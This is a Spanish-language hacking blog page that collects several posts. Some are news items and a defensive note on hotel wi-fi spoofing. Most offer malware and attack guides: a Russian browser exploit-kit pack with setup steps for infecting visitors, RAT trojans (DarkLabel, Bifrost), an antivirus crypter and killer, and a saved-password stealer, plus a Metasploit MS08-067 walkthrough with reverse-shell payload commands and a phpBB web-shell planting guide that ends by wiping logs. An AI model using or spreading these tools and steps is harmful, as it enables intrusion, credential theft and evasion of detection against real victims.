This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

[G00rec0n] Herramienta de Gathering para encontrar Sub-Dominios & Emails

En la etapa de recopilación de información de un pentest, por lo general nos interesa encontrar los diferentes sub-dominios del dominio que tenemos en la mira. Eso se puede lograr con consultas a servidores DNS que utilizan las solicitudes de transferencia de zona o utilizando fuerza bruta, es un buen comienzo, pero puede que se escapen algunos sub-dominios. Otra forma de averiguar los sub-dominios es consultar en Google y comprobar si en su amplios resultados de búsqueda hay Sub-domios. Goorecon es una herramienta que automatiza ese proceso tedioso y además te los enumera con sus respectivas IPs.

Goorecon está desarrollado en ruby y necesita la librería httpclient para funcionar, en la mayoría de los casos ya viene instalada, pero si no:
gem install httpclient

Videos demostración G00rec0n:



Nunca está demás tener este tipo de herramientas al momento de recopilar información de un dominio. Me ha sido bastante util y además G00rec0n puede recopilar los Emails dentro de una web. Lo intenté correr en Windows pero solo me corrió en Backtrack por si preguntan.

Anonymous entregó a WikiLeaks 2 millones de archivos sirios

Así lo han confirmado este fin de semana. El grupo de activistas Anonymous Siria, AntiSec y Peoples Liberation Front entraron en los servidores del gobierno sirio desde el mes de febrero transfiriendo los datos durante semanas y entregándoselos posteriormente a WikiLeaks.



Los archivos hacen referencia a la noticia que os anunciábamos la semana pasada. WikiLeaks comenzaba a publicar una serie de correos, hasta dos millones de archivos, en colaboración con varios medios. Una publicación donde se revelaban los correos de figuras políticas sirias, ministerios y empresas asociadas con el país que databan del mes de agosto del 2006 hasta marzo del 2012 incluyendo información sobre cómo los países occidentales colaboraban con el régimen de Assad.

El comunicado difundido por el grupo de activistas indica que Anonymous habría estado ayudando a los manifestantes sirios durante más de un año, desde la primera semana de su revolución. Anonymous también revela que la operación denominada como OpSiria estaba compuesta por antiguos miembros de LulzSec ahora conocidos como AntiSec junto a Peoples Liberation Front.

En cuanto a los documentos, dos millones de archivos, habría sido una operación que comenzó en el mes de febrero. En el comunicado publicado en Pastebin indican que:

Hemos trabajado día y noche. Los datos disponibles habían sido dercargados de forma masiva en una acción que nos ha llevado varias semanas.

Posteriormente, la descarga de archivos fue enviada a WikiLeaks, una organización que a juicio del grupo de activistas:

Está sumamente bien equipada para manejar la divulgación de documentos de esta magnitud. Mientras los tiranos sigan desafiando, Anonymous seguirá trabajando sin descanso día y noche, en cada país y zona, para ayudar a aquellos que luchan por la libertad y activistas como en Siria.

De esta forma, Anonymous y WikiLeaks vuelven a colaborar por una lucha común tras la publicación que tuvo lugar en el mes de febrero, momento en el que WikiLeaks filtró cinco millones de correos de la firma de seguridad Stratford, tras el “trabajo” de Anonymous en diciembre del 2011.

Veamos que repercución mundial trae estos archivos filtrados...

Hacker publica código fuente de Skype, afirma que la aplicación es un troyano

Un hacker conocido como “57UN” logró adquirir y filtrar en Internet el código fuente del programa para videoconferencias de Microsoft, Skype.




El anuncio se dio a través de comunicado difundido por el grupo hacktivista “Anonymous”. El código fuente, en pocas palabras, se trata del conjunto de instrucciones que un programa sigue para funcionar y que permite a quien lo posee conocer las vulnerabilidades del mismo con el fin de mejorarlo o tomar ventaja de ello para el hackeo de los usuarios.
Por medio del sitio Pastebay.net, el hacker colocó la dirección desde la cual es posible descargar el código fuente:

Skype1.4_binaries:

SkypeKit_sdk+runtimes_370_412.zip - skypekit binaries for Windows and x86_Linux + SDK:

skype55_59_deobfuscated_binaries (Windows):
Al respecto y tras haber revisado el código fuente, el hacker indicó que la seguridad de la aplicación Skype carece fiabilidad y no ofrece estándares “abiertos” que permitan que otros trabajen en la mejora de la seguridad.

“Para los guru’s de seguridad diciéndome sobre la criptografía de Skype, es una aplicación con prácticas de seguridad extremadamente cuestionables y sin estándares abiertos,” dijo en Twitter.

Añadió que la poca seguridad que existe en Skype ha ocasionado que rebeldes en Siria sean atacados e identificados por medio del troyano conocido como BlackShades.

“El troyano es distribuido por medio de cuentas de Skype comprometidas de activistas Sirios en la forma de un archivo .pif que presume ser un video nuevo muy importante pero que por el contrario se trata de un archivo ejecutable malintencionado, que de ser abierto comienza a recolectar información de las computadoras infectadas,” publicó la Fundación Frontera Electrónica (FFE).

Aquí otro caso y prueba increíble de que Skype está proveyendo de una encriptación falsa para afectar al activismo en Siria,” dijo. “Skype es un troyano. Es una herramienta gratuita (gratuita como en la frase cerveza gratuita, pero NO en el sentido de libre) que permite a los usuarios comunicarse.”

En otros datos difundidos, la FFE en febrero del 2008 solicitó documentos al FBI relacionados con un reporte de monitoreo realizado a Skype, esto después de que un artículo publicado en la revista Computerworld, sugirió que las autoridades alemanas habían contratado a a una compañía para la creación de un troyano diseñado para atacar y tomar ventaja de la aplicación de Microsoft, Skype, descubriendo que el FBI tenía una herramienta similar, misma de la cual dio más detalles en agosto del 2009 a través de tres conjuntos de documentos en los que mencionó más sobre el tema.

Pack de exploit rusos para navegadores

Esta es una recopilacion de los exploit rusos para navegadores mas conocidos, la funcion basica de estos exploit es explotar fallas en navegadores, para ejecutar archivos .exe sin autorizacion del usuario de forma totalmente invisible.

My poly sploit


El pack incluye los siguientes exploit:
0x88
adpack-1
adpack-2
armitage
cry217
fiesta-1
fiesta-2
firepack-1
firepack-2
g-pack
ice-pack-1
ice-pack-2
ice-pack-3
infector
mpack
mpack-081
mpack-086
mpack-091
mpack-099
multisploit
my-poly-sploit
rds
smartpack
target-exploit
tor
unkown


Todos estos exploit son del 2008-2009, y funcionan bien en muchas pcs, aunque el porcentaje de infeccion es bajo debido a los parches en los navegadores, pero algunos estan funcionando bien con Internet explorer 7 y firefox 3 sin actualizar, que son los navegadores mas utilizados hoy en dia. 

Ice pack:


Para los que nunca administraron una web, o no tienen idea de programacion tal vez se les haga dificil entenderlos, pero la configuracion de estos exploit es muy simple. Basta con subir todos sus archivos a un servidor que soporte el uso de base de datos, y buscar el archivo config.php, settings.php o similar y editar alli la configuracion de los exploit, tambien deberan crear una base de datos en su host para almacenar los datos, si no no funcionara.

Lo que es configuracion esta todo en ingles, en algunos para la parte de estadisticas pueden ver que esta en ruso, pero no es necesario entender ruso ya que son palabras simples y al hacer click facilmente se puede saber su significado, por ejemplo si lo que quieren es ver cantidad de infectados o pais de donde provienen. Lo que realmente importa esta en ingles.

Mpack: estadisticas


Y como dije antes no recomiendo este tipo de exploit para infectar alguien en especifico, porque no sirve para eso.

Y dejo a los usuarios que vean cada exploit para ver cual es el mejor, los exploit generalmente se encuentran en una carpeta todos juntos, y se puede ver a que navegadores afecta, no puedo poner las caracteristicas de cada uno porque si no no termino mas. Si no para cualquier pregunta, estan los comentarios.

Descarga
Pack de exploit rusos (rapidshare)
Pack de exploit rusos (megaupload)
pass: troyanosyvirus.com.ar

Recomiendo leer FirePack Lite v.0.11, encontraran mas informacion sobre el firepack 0.11, que es (o fue jaja) uno de los mas populares.

Abronsius Code Obfuscator

ACO es una herramienta creada por Abronsius para programadores deVisual basic 6 que sirve para ofuscar el codigo fuente de un programa. Ofuscando el codigo fuente se puede mejorar la indetectabilidad de un programa frente a los antivirus.

Ademas del ofuscador de codigo el programa incluye un crypter con generador de stubs unicos, escaner de antivirus, analisis de detecciones, compilador, y otras herramientas mas. Es una de las mejores herramientas de este tipo.

Lo que mas se destaca de este programa es la calidad y cantidad de herramientas que tiene para ofuscar el codigo para dejar indetectable un programa de forma muy rapida.





Es una herramienta bastante avanzada y solo les servira a quienes saben programar en VB6 fluidamente.

Descarga:
[ACO] v3.0 (rapidshare)
[ACO] v3.0 (megaupload)
Pass: troyanosyvirus.com.ar

DarkLabel 1.0 B4

Les presento este troyano relativamente nuevo, el DarkLabel 1.0 B4, se esta haciendo medio conocido para ser la version 1.0. A mi personalmente no me gusto. Requiere del archivo MSWINSCK.OCX para funcionar, Y en muchas PC no lo tienen por lo tanto no funciona el server. La captura de pantalla es muy mala, pero tiene algunas caracteristicas que no tienen muchos troyanos.
Esperemos que salga la nueva version de este troyanito haber si mejora algunas cosas.

Compiled at 6-12-2007

Caracteristicas:

- Information
- File Manager
- CMD Shell
- Process Manager
- Key Manager
- Downloader
- Screen Manager
- Window Manager
- Passwords
- HTTP Server
- Connection Bouncer
- TCP Tunnel
- MSG Manager
- Clipboard Manager
- Run URL/File
- Power
- Broadcaster

DescargarDarkLabel 1.0 B4 (De su web oficial)
Web Oficialhttp://www.darklabel.uni.cc/
MSWINSCK.OCX: Descarga MSWINSCK.OCX (Archivo requerido para abrir el cliente)

Bifrost 1.2.1 en Español

Para los que no saben ingles o no les gustan tener su bifrost en ingles, b#lo tradujo a español casi completamente, esta muy bueno el trabajo, muy completo, lo realizo con un poco de ayuda de polifemo y de los colaboradores de indetectables.net
El cliente sigue estando desempaquetado por lo que pueden seguir modificandolo si quieren.

Imagenes:






Descarga:Bifrost 1.2.1 en Español (Descarga directa TucHost)
Contraseña: troyanosyvirus.com.ar

Accediendo a Windows XP desde BackTrack 5 utilizando Metasploit

En este tutorial explicare como acceder a una PC con Windows XP (sin sus actualizaciones de seguridad) utilizando Metasploit en BackTrack 5 y el famoso exploit Netapi.
La idea de este tutorial es que sepan lo vulnerable que es un sistema sin descargar las actualizaciones.

Requisitos para este tutorial:
- La PC a la que vamos a acceder debe tener Windows XP, SP1, SP2 o SP3, Windows 2000 o 2003. Y no debe tener los parches de seguridad. Tambien recomendaria desactivar firewalls y antivirus para evitar problemas.
- Para simplificar el tutorial supondremos que la PC a atacar esta en la misma red que la PC Atacante. El exploit tambien funciona con PCs que no esten en la misma red, solo que hay que tener en cuenta otras variables, como el router y el firewall, que no se tendran en cuenta en este tutorial.
- Usare como SO atacante BackTrack 5 que ya viene con todas las herramientas, pueden descargar la iso desde la pagina oficial -->http://www.backtrack-linux.org/downloads/
Despues que descargaron la iso la guardan en un CD/DVD y arrancan el Sistema operativo desde el CD/DVD, o si no pueden usar una maquina virtual como vmware, o virtual box y arrancar el sistema operativo desde la iso. No detallare esto ya que hay mucha informacion en internet decomo iniciar Backtrack 5 desde un CD.

Comenzamos...

1- Comenzamos obteniendo nuestra ip local para saber donde estamos ubicados en la red. Para ello ya dentro de BackTrack Abrimos una Terminal (Ctrl+Alt+T) y escribimos:

ifconfig



Como podemos ver nuestra IP local es 10.0.0.3, podria ser otra del tipo 192.168.X.X o de otro tipo. Apuntamos esta direccion porque nos servira mas adelante.

2- Escaneamos la red con nmap para obtener la direccion IP de los posibles objetivos. Como nuestra IP local es 10.0.0.3, buscaremos objetivos entre el rango 10.0.0.1 y 10.0.0.30, para ello escribimos lo siguiente

nmap -sS -O [Rango de IP]

Ejemplo: nmap -sS -O 10.0.0.1-30
Ejemplo2: nmap -sS -O 192.168.1.1-255



Como podemos ver tenemos una PC con Linux (que no es vulnerable al ataque) y otra con Windows XP, 2000 o 2003 que posiblemente es vulnerable al ataque. Y su IP es 10.0.0.4Apuntaremos esta IP para usarla despues.
Si ya tenemos la IP del objetivo no es necesario hacer este paso asi que simplemente lo saltean.

3- Ya sabemos nuestra IP y la IP del objetivo asi que ahora procederemos al ataque.
Abrimos Metasploit escribiendo en la terminal:

msfconsole



Nos saldra algo asi:



4- Sleccionaremos el exploit Netapi escribiendo lo siguiente:

use exploit/windows/smb/ms08_067_netapi

5- Seteamos como objetivo a la IP de la PC con windows XP:

set RHOST [IP Objetivo]

Ejemplo: set RHOST 10.0.0.4

6- Ahora cargaremos el Payload. En este tutorial mostrare 2 tipos de Payload diferentes, "windows/shell/reverse_tcp" y"windows/vncinject/reverse_tcp"

"windows/shell/reverse_tcp" es una shell remota, se usa cuando se necesita discrecion. El usuario de la PC objetivo no notara que estamos controlando su PC.

Cargamos escribiendo lo siguiente:

set PAYLOAD windows/shell/reverse_tcp

7- Seteamos con nuestra IP local:

set LHOST [IP Local]

Ejemplo: set LHOST 10.0.0.3



8- Enviamos el exploit:

exploit



Y listo! Acceso concedido, ya tenemos una shell remota de la PC con windows XP! Con esta shell tenemos acceso total.

Ahora como otra alternativa usaremos el Payload de VNC"windows/vncinject/reverse_tcp", este Payload permite ver el escritorio remoto. No es nada discreto.

Ahora podemos seguir a partir del punto 5, o seguir desde el punto 8. Es lo mismo.

9- Presionamos (Ctrl+C) para cerrar la conexion de la shell.

10- Cargamos el Payload escribiendo:

set PAYLOAD windows/vncinject/reverse_tcp

11- Seteamos con nuestra IP local:

set LHOST [IP local]
Ejemplo: set LHOST 10.0.0.3

12- Enviamos el exploit escribiendo:

exploit





Y listo ya tenemos acceso remoto a la PC con windows XP mediante VNC!

Resumen de los comandos utilizados:

Tomando como ejemplo las siguientes IPs:
IP de nuestra pc (BackTrack): 10.0.0.3
IP de la PC objetivo (Windows XP): 10.0.0.4
msfconsole
ifconfig
nmap -sS -O 10.0.0.1-255
use exploit/windows/smb/ms08_067_netapi
set RHOST 10.0.0.4
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.0.0.3
exploit


Como pueden ver son muy pocos los comandos utilizados, por lo que a una persona con conocimientos basicos de Metasploit se le hace muy facil acceder a una PC con windows XP sin los parches de seguridad.

Se recomienda actualizar windows XP para evitar este tipo de ataques.

Links de interes:
Video de youtube: Exploiting windows xp with BackTrack 5 using metasploit
Curso de Metasploit Unleashed en Español

Facebook Password Decryptor

Facebook Password Decryptor es una aplicacion de SecurityXploded que permite recuperar las contraseñas guardadas de Facebook en los navegadores y mensajeros mas conocidos.

Esta aplicacion solo funciona cuando se usa la opcion "Recordar contraseña" en los navegadores o mensajeros.
Lo que hace el programa es buscar estas contraseñas guardadas y desencriptarlas para luego mostrarla en pantalla.

La aplicacion funciona en modo grafico o en modo consola.



Facebook Password Decryptor recupera las contraseñas de las siguientes aplicaciones:

- Internet Explorer
- Firefox
- Google Chrome
- Opera
- Apple Safari
- Flock Browser
- Paltalk Messenger
- Miranda Messenger

Su modo de uso es muy simple, solo hay que abrir el Facebook Password Decryptor y luego dar click en "Start recovery"

Descarga ultima version (Febrero 2012):
Facebook Password Decryptor 2.0 - (Descarga directa desde Tuchost sin publicidad)
Facebook Password Decryptor 2.0 - (Descarga desde pagina oficial con publicidad)
Contraseña: troyanosyvirus.com.ar

Pagina oficial: http://securityxploded.com

Iceberg Generator Tool V.Beta

Iceberg Generator Tool es un Killer de programas de seguridad creado por Sanko y Slore.
Esta diseñada para deshabilitar los programas de proteccion mas conocidos y evitar que se actualizen o ejecuten.



Caracteristicas:

- Melt (Elimina el archivo al ejecutarlo)
- Persistencia en autoinicio
- Mata algúnos softwares de protección.
- Oculta procesos en el administrador de tareas
- Apagado el pc al tratar de borrar el archivo
- Encriptable

Instalar dependencia
El programa utiliza una dependencia, si al intentar abrirlo les da un error deben instalarla.
Para instalarla deben abrir el archivo "Register.exe" ubicado en la carpeta "Codejock" de la descarga, luego le dan click en "Register". Eso es todo, ahora deberia abrir bien el programa.

Modo de uso
Su uso es muy simple solo seleccionan el programa que desean deshabilitar y se generara un archivo en la carpeta donde se encuentra el Iceberg Generator, ese archivo (killer) es el que matara el proceso.
Pueden generar uno o varios Killers o todos en un solo archivo.

Video:


Esta es una version beta y como es de suponer tiene algunas fallas, pero funciona muy bien con la mayoria de los antivirus.

¡ADVERTENCIA: NO EJECUTAR EN SUS PCS LOS ARCHIVOS QUE GENERA. USAR SOLO EN PCS DE PRUEBA!

Descarga: 
Iceberg Generator Tool V.Beta - (Descarga directa Tuchost.com)

Contraseña del rar: troyanosyvirus.com.ar

Cuidado con hotspot wi-fi en hoteles – Precauciones

Ahora que se acerca el verano y que muchos de los que nos leéis (gracias) vais a disfrutar de unas merecidas vacaciones, nos toca alertaros acerca del uso de algún hotspot wi-fi en hoteles, albergues, estaciones, aeropuertos…
El caso es que ayer, durante un seminario en un hotel, pude comprobar lo sencillo que resulta descubrir equipos en una red y capturar tráfico de la misma. Desde nuestro blog de hacking ético queremos dar algunos consejos de cara al verano.
Ataque arp y dns spoofing
Hay que tener en cuenta que a esa red que nos conectamos gracias a la generosidad (o no) del hotel, hay más usuarios conectados, y entre ellos alguien con otros intereses que ver la portada de Cristiano Ronaldo en el Marca o repasar nuestro muro de Facebook. Lo que este atacante o intruso puede hacer es “envenar” la red para que enviemos nuestro tráfico Web a su ordenador en lugar de hacerlo directamente a la puerta de enlace legítima (punto de acceso, proxy o router del hotel).
Os aseguro que es realmente sencillo. Existen herramientas automatizadas que montan un escenario con este tipo de ataques en cuestión de minutos. Las técnicas que usan son ARP spoofing para engañar a los equipos conectados y DNS spoofing para redirigirnos a otros sitios Web o clones de sitios Web legítimos.
En otro post explicaré en detalle y de forma más técnica, cómo funciona realmente estos ataques, con ejemplos reales y prácticos. Con estas técnicas podemos ser víctimas desuplantación de identidad (phishing)robo de credenciales y de otras amenazas.
De momento y como contramedida os aconsejo que uséis navegación segura en vuestro tráfico Web. Es decir, intentad usar el protocolo https en lugar del http. La mayoría de Webs que requieren autenticación (Facebook, Twitter, Hotmail, Gmail…) permiten realizar el proceso de autenticación mediante cifrado usando el protocolo https. De esta forma aunque nos capturaran el tráfico, la información irá cifrada.
Para avanzados, comprobad qué dirección IP os han asignado, y antes de visitar una Web hacedle un ping al dominio para ver qué IP responde. Si es del mismo rango que el vuestro, posiblemente algún atacante esté realizando un ataque de DNS spoofing.
Por ejemplo, si me asignan la dirección IP 10.0.0.15 y al hacerle ping a www.facebook.com me responde con 10.0.0.150, algo raro está pasando, ¿no? ;-)
Para profesionales que necesiten conectarse a su empresa para trabajar de forma remota, hacedlo mediante una VPN. Hoy en día existen soluciones muy sencilla para realizar conexiones seguras, por ejemplo, clientes VPN por SSL

Subir Shell en Foros PHPBB


Hola, hoy vamos a ver como subir nuestra shell en foros PHPBB, como sabemos, teniendo una shell podemos tener todo el control de un sitio web.

Empecemos:

Entramos al link del panel admin: http://site.com/adm/index.php
Una vez que tengamos acceso de administrador, vamos hasta el final del foro:

Como podemos ver, si la cuenta tiene acceso de administrador, podemos ver el enlace del panel de administración

Si logramos ingresar como administrador del foro podemos apreciar el panel:


En la ficha configuración, vamos hacia abajo para la configuración de seguridad:


Ahora vamos hacia abajo para permitir el PHP en las plantillas, aseguremos de que esta opción este activada en YES.

Ahora vamos a la pestaña de estilos, en Componentes de Estilo, hacemos clic en Plantillas:



Nos mostrara las plantillas instaladas, hacemos clic en editar en la parte superior:


Ahora, bajo la plantilla seleccionada, seleccionams faq_body.html:


Imagen de la edicion de faq_body.html:

Copiamos todo el texto & lo guardamos en archivo .txt


Ahora, borramos todo & pegamos este codigo:
<!-- PHP -->

phpinfo();

<!-- ENDPHP -->




Clickeamos en Submit:


Ahora nos dirigimos a la pagina FAQ:
http://www.site.com/faq.php



Ahora sabemos que podemos ejecutar comandos remotos & generar nuestra shell.

Regresamos a donde hemos editado el archivo, y reemplazar phpinfo (); con nuestro codigo de la shell


Ahora nos dirigimos otra vez a la pagina FAQ & nuestra shell estara ahí :)


Ahora borramos todos los logs para no dejar rastros:


Ahora podemos ir a la shell & hacer lo que querramos.